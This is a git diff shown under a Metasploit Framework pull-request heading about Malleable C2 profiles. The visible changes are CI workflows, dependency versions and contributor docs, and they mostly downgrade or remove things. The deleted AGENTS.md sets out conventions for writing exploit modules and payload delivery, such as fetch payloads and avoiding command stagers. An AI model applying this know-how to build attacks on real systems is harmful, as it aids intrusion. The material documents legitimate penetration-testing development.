Merge pull request #20419 from OJ/feature/malleable-c2

Initial support for Malleable C2 Profiles in HTTP Meterpreter
Change MALLEABLEC2 option type to OptPath
2026-04-01 08:46:50 -04:00 · 2026-03-27 14:44:46 +01:00 · 2026-03-27 14:43:49 +01:00 · 2026-03-22 14:20:59 +10:00 · 2026-03-22 13:48:26 +10:00 · 2026-03-22 09:50:18 +10:00
3604 changed files with 38540 additions and 159015 deletions
@@ -1,3 +0,0 @@
-# Copilot Instructions
-
-Refer to [AGENTS.md](../AGENTS.md) in the repository root for all project conventions, coding standards, and AI agent guidelines.
@@ -1,19 +0,0 @@
-name: Add pull request to the kanban board
-
-on:
-  pull_request_target:
-    types:
-       - opened
-       - reopened
-
-jobs:
-  add-to-project:
-    name: Add pull request to the kanban board
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/add-to-project@v1.0.2
-        with:
-          project-url: https://github.com/orgs/rapid7/projects/17
-          # smcintyre/GITHUB_PROJECT_TOKEN (PAT), Expires on Wed, Jan 27 2027
-          github-token: ${{ secrets.GH_PROJECT_TOKEN }}
-
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.3'
+          - '3.0'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -1,68 +0,0 @@
-name: Extended Tests
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  # This action can update/close pull requests
-  pull-requests: write
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  pull_request_target:
-    branches:
-      - '*'
-    paths:
-      - '**/**ldap**'
-      - '**/**kerberos**'
-      - '**/**gss**'
-
-jobs:
-  add-labels:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/github-script@v6
-        with:
-          github-token: ${{secrets.GITHUB_TOKEN}}
-          script: |
-            // NOTE: The following section is JavaScript. Note that backticks will need to be escaped within
-            // the multiline comment strings in the following config. When editing this file, using JavaScript
-            // syntax highlighting might be easier.
-            //
-            // This script has intentionally been inlined instead of using third-party Github actions for both
-            // security and performance reasons.
-            const currentLabelNames = context.payload.pull_request.labels.map(label => label.name);
-            const newLabelName = "additional-testing-required";
-            const comment = `
-              Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
-
-              We've added the \`${newLabelName}\` label to indicate that additional testing is required before this pull request can be merged.
-              For maintainers, this means visiting [here](https://jenkins-metasploit.build.r7ops.com/job/pro_manual_test_trigger/).
-            `;
-
-            if (!currentLabelNames.includes(newLabelName)) {
-              await github.rest.issues.addLabels({
-                issue_number: context.issue.number,
-                owner: context.repo.owner,
-                repo: context.repo.repo,
-                labels: [newLabelName]
-              });
-
-              const precedingWhitespaceLength = comment.split("\n")[1].search(/\S/);
-              const commentWithoutPrecedingWhitespace = comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
-              await github.rest.issues.createComment({
-                issue_number: context.issue.number,
-                owner: context.repo.owner,
-                repo: context.repo.repo,
-                body: commentWithoutPrecedingWhitespace
-              });
-            }
@@ -62,7 +62,3 @@ jobs:
          ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
          ls -la ./.git/hooks
          ./.git/hooks/post-merge
-
-      - name: Verify encoding
-        run: |
-          bundle exec ruby tools/dev/verify_encoding.rb
@@ -44,7 +44,6 @@ on:
      - 'Gemfile.lock'
      - 'data/templates/**'
      - 'modules/payloads/**'
-      - 'lib/msf/base/sessions/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
      - 'test/modules/**'
@@ -31,7 +31,7 @@ jobs:
          - ubuntu-latest
          - windows-2022
          - windows-2025
-          - macos-15-intel
+          - macos-13

    env:
      RAILS_ENV: test
@@ -12,37 +12,9 @@ on:
        required: false
        default: "[]"
        type: string
-      additional_rails_versions:
-        description: 'Additional Rails version requirements as a JSON array (for example: ["~> 8.1.0"])'
-        required: false
-        default: "[]"
-        type: string
-        # Caller example:
-        # with:
-        #   additional_rails_versions: '["~> 8.1.0", "~> 8.2.0"]'

 jobs:
-  prepare_matrix:
-    runs-on: ubuntu-latest
-    outputs:
-      rails_versions: ${{ steps.merge_rails_versions.outputs.rails_versions }}
-    steps:
-      - name: Build Rails version matrix
-        id: merge_rails_versions
-        run: |
-          default_rails_versions='["~> 7.0.0","~> 7.1.0","~> 7.2.0"]'
-          additional_rails_versions='${{ inputs.additional_rails_versions }}'
-
-          rails_versions=$(jq -cn \
-            --argjson defaults "$default_rails_versions" \
-            --argjson extras "$additional_rails_versions" \
-            '$defaults + $extras | unique')
-
-          echo "rails_versions=$rails_versions" >> "$GITHUB_OUTPUT"
-        shell: bash
-
  test:
-    needs: prepare_matrix
    runs-on: ${{ matrix.os }}
    timeout-minutes: 40

@@ -53,16 +25,18 @@ jobs:
          - '3.2'
          - '3.3'
          - '3.4'
-        rails: ${{ fromJSON(needs.prepare_matrix.outputs.rails_versions) }}
+        rails:
+          - '~> 7.0.0'
+          - '~> 7.1.0'
+          - '~> 7.2.0'
        postgres:
-          - '14.19'
+          - '9.6'
          - '16.8'
        os:
          - ubuntu-latest

    env:
      RAILS_ENV: test
-      RAILS_VERSION: ${{ matrix.rails }}

    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
    steps:
@@ -67,7 +67,7 @@ jobs:
      fail-fast: false
      matrix:
        os:
-          - macos-15-intel
+          - macos-13
          - windows-2022
          - ubuntu-latest
        ruby:
@@ -92,7 +92,7 @@ jobs:
          # - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2025 }

          # Mettle
-          - { meterpreter: { name: mettle }, os: macos-15-intel }
+          - { meterpreter: { name: mettle }, os: macos-13 }
          - { meterpreter: { name: mettle }, os: ubuntu-latest }

    runs-on: ${{ matrix.os }}
@@ -112,18 +112,8 @@ jobs:
        if: runner.os == 'Linux'
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

-      # Use setup-php@2.31.1 for Windows (PHP 5.3 on windows-2022 is broken with later versions while PHP 7.4 and 8.3
-      # are broken on MacOS with this version)
-      - name: Use setup-php@2.31.1 to install PHP for Windows runners
-        uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
-        if: ${{ matrix.meterpreter.name == 'php' && runner.os == 'Windows' }}
-        with:
-          php-version: ${{ matrix.meterpreter.runtime_version }}
-          tools: none
-
-      - name: Use setup-php@2.37.0 to install PHP for non-Windows runners
-        uses: shivammathur/setup-php@accd6127cb78bee3e8082180cb391013d204ef9f
-        if: ${{ matrix.meterpreter.name == 'php' && runner.os != 'Windows' }}
+      - uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
+        if: ${{ matrix.meterpreter.name == 'php' }}
        with:
          php-version: ${{ matrix.meterpreter.runtime_version }}
          tools: none
@@ -202,7 +192,7 @@ jobs:
          ref: ${{ inputs.metasploit_framework_commit }}

      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths when running on Windows
+      - name: Support longpaths
        if: runner.os == 'Windows'
        run: git config --system core.longpaths true

@@ -279,26 +269,12 @@ jobs:
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
-        shell: pwsh
+        shell: cmd
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
        run: |
-          Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
-          dir
-        # $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
-        # $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
-        # $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
-        # $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
-        # if ($process.ExitCode -eq 0) {
-        #   Write-Host "components have been successfully added"
-        # } else {
-        #   Write-Host "components were not installed"
-        #   exit 1
-        # }
-        # Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
-        # $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
-        # Write-Host $r
-        # $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
-        # Write-Host $r
+          cd c/meterpreter
+          git submodule init && git submodule update
+          make.bat
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
@@ -102,6 +102,3 @@ rspec.failures

 #Ignore any base disk store files
 db/modules_metadata_base.pstore
-
-# gradle build files
-**/.gradle
@@ -1,12 +0,0 @@
---
-inclusion: always
---
-
-# Metasploit Framework — Kiro Steering
-
-Follow the project's AI agent instructions and coding conventions defined in the repository root.
-
-## References
- AI agent instructions: #[[file:AGENTS.md]]
- Contributing guide: #[[file:CONTRIBUTING.md]]
- RuboCop config: #[[file:.rubocop.yml]]
@@ -24,9 +24,6 @@ require:
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
  - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
-  - ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb
-  - ./lib/rubocop/cop/lint/datastore_srvhost_usage.rb
-  - ./lib/rubocop/cop/lint/bare_check_code_in_non_exploit.rb

 Layout/SpaceBeforeBrackets:
  Enabled: true
@@ -679,20 +676,3 @@ Style/UnpackFirst:

 Lint/DetectMetadataTrailingLeadingWhitespace:
  Enabled: true
-
-Lint/DetectOutdatedCmdExecApi:
-  Description: >-
-    Detects outdated usage of cmd_exec with separate arguments.
-    Use `create_process(executable, args: [], time_out: 15, opts: {})` API with an args array instead.
-  Enabled: true
-
-Lint/BareCheckCodeInNonExploit:
-  Description: >-
-    Use Exploit::CheckCode instead of bare CheckCode in non-exploit modules.
-    Bare CheckCode will raise a NameError at runtime in auxiliary, post, and evasion modules
-    because CheckCode is defined inside Msf::Exploit which is not in their ancestor chain.
-  Enabled: true
-  Include:
-    - 'modules/auxiliary/**/*'
-    - 'modules/post/**/*'
-    - 'modules/evasion/**/*'
@@ -1,122 +0,0 @@
-# AI Agent Instructions for Metasploit Framework
-
-## Project Overview
-
-Metasploit Framework is an open-source penetration testing and exploitation framework written in Ruby. It provides infrastructure for developing, testing, and executing exploit code against remote targets.
-
-## Project Structure
-
- `modules/` — Metasploit modules (exploits, auxiliary, post, payloads, encoders, evasion, nops)
- `lib/msf/` — Core framework library code
- `lib/rex/` — Rex (Ruby Exploitation) library
- `lib/metasploit/` — Metasploit namespace libraries
- `data/` — Data files used by modules (wordlists, templates, binaries)
- `spec/` — RSpec test suite
- `tools/` — Developer and operational tools
- `plugins/` — msfconsole plugins
- `scripts/` — Example automation scripts
-
-## Coding Conventions
-
- Ruby (see `.ruby-version` for the current version). Minimum supported: 3.1+
- Follow the project's `.rubocop.yml` configuration — run `rubocop` on changed files before submitting
- Run `ruby tools/dev/msftidy.rb <module_file_path>` to catch common module issues
- Add `# frozen_string_literal: true` to new files (the RuboCop cop is disabled project-wide for legacy code, but new files should include it)
- No enforced line length limit, but keep code readable
- Use `%q{}` for long multi-line strings (curly braces preferred for module descriptions)
- Multiline block comments are acceptable for embedded code snippets/payloads
- Don't use `get_`/`set_` prefixes for accessor methods in new code
- Method parameter names must be at least 2 characters (exception for well-known crypto abbreviations)
-
-### Module Development
-
- Prefer writing modules in Ruby. Go and Python modules are accepted, but their external runtimes don't support the full framework API (e.g. network pivoting). Ruby modules do not have this limitation
- Prefer using hash over an array for return values, and use kwargs for reusable APIs for future extensions
- Before writing a new module, check that there is not an existing module or open pull request that already covers the same functionality
- Each module should be in its own file under the appropriate `modules/` subdirectory. In some scenarios adding module actions or targets is preferred.
- Exploits require a `DisclosureDate` field
- Exploits, auxiliary, and post modules require `Notes` with `SideEffects`
- Use the module mixin APIs — don't reinvent the wheel
- Use `create_process(executable, args: [], time_out: 15, opts: {})` instead of the deprecated `cmd_exec` with separate arguments
- License new code with `MSF_LICENSE` (the project default, defined in `lib/msf/core/constants.rb`)
- When overriding `cleanup`, always call `super` to ensure the parent mixin chain cleans up connections and sessions properly
- When possible don't set a default payload (`DefaultOptions` with `'PAYLOAD'`) in modules — let the framework choose the most appropriate payload automatically
- New modules require an associated markdown file in the `documentation/modules` folder with the same structure, including steps to set up the vulnerable environment for testing
- Module descriptions or documentation should list the range of vulnerable versions and the fixed version of the affected software, when known
- `report_service` method called when a service can be reported
- `report_vuln` method called when a vuln can be reported
- When creating a fake account / username use FAKER not `rand_test_alphanumeric`
- Always use `res.get_json_document` to convert an HTTP response to a hash instead of calling `JSON.parse(res.body)`
- If there's only one `ACTION` in the exploit, it can likely be omitted.
- `Msf::Exploit::SQLi` should be used if it's exploiting an SQLi
- All `print_*` calls should start with a capital
- when opening a file, make sure the file exists first
- when checking for a string in a response - will it always be in english?
- Ensure hardcoded strings being regex'ed will be consistent across multiple versions
- Use the TEST-NET-1 range for example / non-routeable IP addresses in unit tests and spec files: `192.0.2.0`. Local/private IPs are fine in module documentation scenarios.
- Use fetch payload instead of command stagers when only options that request the stage are available (i.e. don’t use a cmd stager and only allow curl/wget).
- Define bad characters instead of explicitly base-64 encoding payloads
- Use `ARCH_CMD` payloads instead of command stagers when only curl/wget and other download mechanisms would be available
- Don’t check the number of sessions at the end of an exploit and report success based on that, not all payloads open sessions
- Don’t submit any kind of opaque binary blob, everything must include source code and build instructions
- Don’t print host information like `#{ip}:#{port}` because it doesn’t handle IPv6 addresses, instead use `#{Rex::Socket.to_authority(ip, port)}`
- Implement a `check` method when possible to allow users to verify vulnerability before exploitation
-
-### Check Methods
-
- `check` methods must only return `CheckCode` values (e.g. `CheckCode::Vulnerable`, `CheckCode::Safe`) — never raise exceptions or call `fail_with`
- When writing a `check` method, verify it does not produce false positives when run against unrelated software or services
- Prefer using `Rex::Version` for version checks
- Use `fail_with(Failure::UnexpectedReply, '...')` (and other `Failure::*` constants) to bail out of `exploit`/`run` methods — don't use `raise` or bare `return` for error conditions
- `get_version` methods should return a REX version
- `CheckCode::Vulnerable` is only used when the vulnerability has been exploited
- `CheckCode::Appears`  is only used when the application's versions has been checked`
- Use specific regular expressions or `res.get_html_document` for version extraction with CSS selectors. Don't use a generic selectors like `href .*` dot star to grab the version, be more precise.
- Do catch exceptions that may be raised and ensure a valid Check Code is returned
- Do research and determine a minimum version where the application is vulnerable, mark prior versions as safe
- Check helper methods that are used by both `#check` and `#exploit` (or `#run`) and make sure there is no condition (exception, return, etc) where `#check` could return something else than CheckCode.
- Prefer `prepend Msf::Exploit::Remote::AutoCheck` over manually calling `check` inside `exploit` — this lets the framework handle check-before-exploit automatically
-
-### Library Code
-
- When adding complex binary or protocol parsing (e.g. BinData, RASN1, Rex::Struct2), include a code comment linking to the specification or RFC that defines the format being implemented
- Write RSpec tests for any library changes
- Follow [Better Specs](http://www.betterspecs.org/) conventions
- Write YARD documentation for public methods
- Keep PRs focused — small fixes are easier to review
- Any new hash cracking implementations require adding a test hash to `tools/dev/hash_cracker_validator.rb` and ensuring that passes without error
-
-### Testing
-
- Tests live in `spec/` mirroring the `lib/` structure
- Run tests with: `bundle exec rspec spec/path/to/spec.rb`
-
-### Preferred Libraries
-
- Use the `RubySMB` library for SMB modules
- Use `Rex::Stopwatch.elapsed_time` to track elapsed time
- Use the `Rex::MIME::Message` class for MIME messages instead of hardcoding XML
- When creating random variable names prefer `Rex::RandomIdentifier::Generator` and specify the runtime language used. This avoids generating langauge keywords that would break the script.
-
-## Common Patterns
-
- Register options with `register_options` and `register_advanced_options`
- Use `SCREAMING_SNAKE_CASE` option names and `CamelCase` advanced option names
- Use `datastore['OPTION_NAME']` to access module options
- Use `print_status`, `print_good`, `print_error`, `print_warning` for console output
- Use `vprint_*` variants for verbose-only output
- Use `send_request_cgi` for HTTP requests in modules
- Use `connect` / `disconnect` for TCP socket operations
-
-## Before Submitting
-
- Ensure `rubocop` and `msftidy` pass on any changed files with no new offenses
- Ensure `ruby tools/dev/msftidy_docs.rb <documentation_file>` passes on any changed documentation markdown docs with no new offenses
-
-## What NOT to Do
-
- Don't submit untested code — all code must be manually verified
- Don't include sensitive information (IPs, credentials, API keys, hashes of credentials) in code or docs
- Don't include more than one module per pull request
- Don't add new scripts to `scripts/` — use post modules instead
- Don't use `pack`/`unpack` with invalid directives (enforced by linter)
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report it directly to
-smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.
+caitlin_condon@rapid7.com or todb@metasploit.com.

 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.
@@ -8,14 +8,14 @@ Before we get into the details of contributing code, you should know there are m
 - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new/choose) with detailed information about your issue or idea:
 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
- - [Help fellow users with open issues](https://github.com/rapid7/metasploit-framework/issues). This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
+ - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
 - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
 - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
+ - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.


 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. For a detailed reference of our coding conventions, project structure, and preferred patterns, see [AGENTS.md](./AGENTS.md). Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.

 Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.

@@ -25,10 +25,8 @@ will be closed. We need to ensure the code we're adding to master is written to
 ## Expedited Module Creation Process
 We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.

-## Vibecoding, AI, and LLM
-My first job had a token ring LAN and I still own a Win98SE CD, so I'm not entirely sure what _vibecoding_ is, but we're cool with any coding technique you use to create a PR as long as it is tested, documented, and does what it says it does.  Untested code is incomplete code, and incomplete code should be marked as a draft PR or WIP (Work in Progress) until it is complete, tested, and ready for a committer to review.  We have had several submissions clearly from AI that were well-formatted, looked really neat, and did nothing it said it did.  While we have no problem with AI-assisted coding, please do not assume that the code generated by an AI or LLM is logically or even syntactically correct.
-
 ### Code Contribution Do's & Don'ts:
+
 Keeping the following in mind gives your contribution the best chance of landing!

 #### <u>Pull Requests</u>
@@ -44,7 +42,7 @@ Keeping the following in mind gives your contribution the best chance of landing
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** test your code and submit the test output in your PR with any sensitive information removed.
+* **Do** test your code.
 * **Do** list [verification steps] so committers can test your code.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
@@ -87,7 +85,7 @@ When reporting Metasploit issues:
 * **Don't** attempt to report issues on a closed PR.

 If you need some more guidance, talk to the main body of open source contributors over on our
-[GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) or [Metasploit Slack]
+[Metasploit Slack] or [#metasploit on Freenode IRC].

 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2026, Rapid7, Inc.
+Copyright (C) 2006-2025, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -53,6 +53,5 @@ group :test do
  gem 'allure-rspec'
  # Manipulate Time.now in specs
  gem 'timecop'
-  # stub and set expectations on HTTP requests
-  gem 'webmock', '~> 3.18'
 end
+
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.133)
+    metasploit-framework (6.4.79)
      aarch64
      abbrev
      actionpack (~> 7.2.0)
@@ -21,7 +21,6 @@ PATH
      bson
      chunky_png
      csv
-      date (= 3.4.1)
      dnsruby
      drb
      ed25519
@@ -29,7 +28,7 @@ PATH
      em-http-request
      eventmachine
      faker
-      faraday
+      faraday (= 2.7.11)
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
@@ -42,14 +41,13 @@ PATH
      jsobfu
      json
      lru_redux
-      mcp (= 0.13.0)
      metasm
      metasploit-concern
-      metasploit-credential (>= 6.0.21)
+      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.245)
-      metasploit_data_models (>= 6.0.15)
-      metasploit_payloads-mettle (= 1.0.46)
+      metasploit-payloads (= 2.0.221)
+      metasploit_data_models (>= 6.0.7)
+      metasploit_payloads-mettle (= 1.0.42)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -62,25 +60,23 @@ PATH
      network_interface
      nexpose
      nokogiri
-      octokit
+      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
      ostruct
      packetfu
-      parallel
      patch_finder
      pcaprub
      pdf-reader
      pg
      puma
-      rack (~> 2.2)
+      rack
      railties
      rasn1 (= 0.14.0)
      rb-readline
      recog
      redcarpet
      reline
-      rest-client
      rex-arch
      rex-bin_tools
      rex-core
@@ -99,20 +95,19 @@ PATH
      rex-struct2
      rex-text
      rex-zip
-      rexml (= 3.4.1)
      rinda
      ruby-macho
      ruby-mysql
-      ruby_smb (~> 3.3.17)
+      ruby_smb (~> 3.3.15)
      rubyntlm
      rubyzip
-      sinatra (~> 3.2)
+      sinatra
      sqlite3 (= 1.7.3)
      sshkey
      stringio (= 3.1.1)
      swagger-blocks
      syslog
-      thin (~> 1.x)
+      thin
      tzinfo
      tzinfo-data
      unix-crypt
@@ -131,9 +126,9 @@ GEM
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.2.2.2)
-      actionview (= 7.2.2.2)
-      activesupport (= 7.2.2.2)
+    actionpack (7.2.2.1)
+      actionview (= 7.2.2.1)
+      activesupport (= 7.2.2.1)
      nokogiri (>= 1.8.5)
      racc
      rack (>= 2.2.4, < 3.2)
@@ -142,19 +137,19 @@ GEM
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
      useragent (~> 0.16)
-    actionview (7.2.2.2)
-      activesupport (= 7.2.2.2)
+    actionview (7.2.2.1)
+      activesupport (= 7.2.2.1)
      builder (~> 3.1)
      erubi (~> 1.11)
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
-    activemodel (7.2.2.2)
-      activesupport (= 7.2.2.2)
-    activerecord (7.2.2.2)
-      activemodel (= 7.2.2.2)
-      activesupport (= 7.2.2.2)
+    activemodel (7.2.2.1)
+      activesupport (= 7.2.2.1)
+    activerecord (7.2.2.1)
+      activemodel (= 7.2.2.1)
+      activesupport (= 7.2.2.1)
      timeout (>= 0.4.0)
-    activesupport (7.2.2.2)
+    activesupport (7.2.2.1)
      base64
      benchmark (>= 0.3)
      bigdecimal
@@ -169,10 +164,10 @@ GEM
    addressable (2.8.7)
      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
-    allure-rspec (2.27.0)
-      allure-ruby-commons (= 2.27.0)
+    allure-rspec (2.26.0)
+      allure-ruby-commons (= 2.26.0)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.27.0)
+    allure-ruby-commons (2.26.0)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
@@ -208,41 +203,38 @@ GEM
      aws-sigv4 (~> 1.5)
    aws-sigv4 (1.11.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.3.0)
+    base64 (0.2.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
    benchmark (0.4.1)
-    bigdecimal (3.3.1)
+    bigdecimal (3.2.2)
    bindata (2.4.15)
    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (5.1.1)
+    bson (5.0.2)
    builder (3.3.0)
-    byebug (12.0.0)
+    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
    concurrent-ruby (1.3.5)
-    connection_pool (2.5.4)
+    connection_pool (2.5.3)
    cookiejar (0.3.4)
-    crack (1.0.1)
-      bigdecimal
-      rexml
    crass (1.0.6)
    csv (3.3.2)
    daemons (1.4.1)
    date (3.4.1)
-    debug (1.11.0)
+    debug (1.10.0)
      irb (~> 1.10)
      reline (>= 0.3.8)
    diff-lcs (1.6.2)
-    dnsruby (1.73.1)
-      base64 (>= 0.2)
-      logger (~> 1.6)
+    dnsruby (1.72.4)
+      base64 (~> 0.2.0)
+      logger (~> 1.6.5)
      simpleidn (~> 0.2.1)
    docile (1.4.1)
    domain_name (0.6.20240107)
    drb (2.2.3)
-    ed25519 (1.4.0)
+    ed25519 (1.3.0)
    elftools (1.3.1)
      bindata (~> 2)
    em-http-request (1.1.7)
@@ -254,12 +246,12 @@ GEM
    em-socksify (0.3.3)
      base64
      eventmachine (>= 1.0.0.beta.4)
-    erb (5.0.3)
+    erb (5.0.2)
    erubi (1.13.1)
    eventmachine (1.2.7)
-    factory_bot (6.5.5)
+    factory_bot (6.5.4)
      activesupport (>= 6.1.0)
-    factory_bot_rails (6.5.1)
+    factory_bot_rails (6.5.0)
      factory_bot (~> 6.5)
      railties (>= 6.1.0)
    faker (3.5.1)
@@ -285,13 +277,11 @@ GEM
    gyoku (1.4.0)
      builder (>= 2.1.2)
      rexml (~> 3.0)
-    hashdiff (1.2.1)
    hashery (2.1.2)
    hrr_rb_ssh (0.4.2)
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-accept (1.7.0)
    http-cookie (1.0.8)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
@@ -308,10 +298,7 @@ GEM
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.15.1)
-    json-schema (6.2.0)
-      addressable (~> 2.8)
-      bigdecimal (>= 3.1, < 5)
+    json (2.10.2)
    language_server-protocol (3.17.0.5)
    license_finder (5.11.1)
      bundler
@@ -322,7 +309,7 @@ GEM
      xml-simple
    lint_roller (1.1.0)
    little-plugger (1.1.4)
-    logger (1.7.0)
